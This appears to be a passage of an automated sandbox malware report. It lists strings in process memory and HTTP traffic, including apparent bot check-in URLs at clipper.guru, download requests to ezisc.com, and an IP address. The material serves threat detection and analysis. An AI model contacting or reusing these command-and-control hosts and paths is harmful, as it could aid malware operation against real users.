Source: powershell.exe, 00000016.00000002.545531135.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsoletera
Source: powershell.exe, 00000016.00000002.545531135.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp	String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuerys-

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /ofg7dfg312.wretg HTTP/1.1Host: ezisc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dmi1dfg7n.iujgy HTTP/1.1Host: ezisc.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sdfs34nh.hjhk HTTP/1.1Host: ezisc.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 45.159.189.115 45.159.189.115

Source: svcupdater.exe, 00000011.00000002.544790272.000000C00003E000.00000004.00001000.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.547465453.000000C00018E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clipper.guru/bot/online?guid=computer
Source: svcupdater.exe, 00000011.00000002.547433023.000000C00018C000.00000004.00001000.00020000.00000000.sdmp, svcupdater.exe, 00000011.00000002.544639154.000000C00002E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://clipper.guru/bot/regex?key=79af1e5a26dc8ad71542cfa94bd6c11764fd9f9531b1e509278be5b87528ae46
Source: AppLaunch.exe, 00000002.00000002.459623951.000000000A738000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: AppLaunch.exe, 00000002.00000002.415836138.00000000072A6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.412233774.000000000721E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.416153323.00000000072BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ezisc.com
Source: AppLaunch.exe, 00000002.00000002.412233774.000000000721E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ezisc.com(y
Source: setup.exe, 00000015.00000000.389861129.000000000040A000.00000008.00000001.01000000.0000000E.sdmp, setup.exe, 00000015.00000002.531824079.000000000040A000.00000004.00000001.01000000.0000000E.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 00000016.00000002.545531135.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faulth
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.540444937.0000000004DD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: powershell.exe, 00000016.00000002.545531135.0000000004FD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23
Source: AppLaunch.exe, 00000002.00000002.412233774.000000000721E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: AppLaunch.exe, 00000002.00000002.417833586.0000000007369000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: AppLaunch.exe, 00000002.00000002.411108926.00000000071D3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3
Source: AppLaunch.exe, 00000002.00000002.412233774.000000000721E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: AppLaunch.exe, 00000002.00000002.409205625.0000000007141000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6
